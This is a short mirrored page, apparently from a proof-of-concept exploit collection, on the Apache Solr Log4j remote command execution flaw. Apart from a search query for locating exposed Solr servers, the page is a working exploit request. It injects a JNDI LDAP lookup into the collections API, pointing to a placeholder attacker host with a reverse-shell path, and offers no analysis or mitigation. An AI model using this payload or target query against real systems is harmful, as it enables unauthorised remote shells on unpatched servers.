mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
32 lines
416 B
Markdown
32 lines
416 B
Markdown
# Apache Solr Log4j 组件 远程命令执行漏洞
|
|
|
|
## 漏洞描述
|
|
|
|
Apache Solr Log4j 组件 远程命令执行漏洞,详情略
|
|
|
|
## 漏洞影响
|
|
|
|
```
|
|
Apache Solr
|
|
```
|
|
|
|
## 网络测绘
|
|
|
|
```
|
|
app="APACHE-Solr"
|
|
```
|
|
|
|
## 漏洞复现
|
|
|
|
登录页面
|
|
|
|
|
|
|
|
验证 POC
|
|
|
|
```
|
|
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json
|
|
```
|
|
|
|
|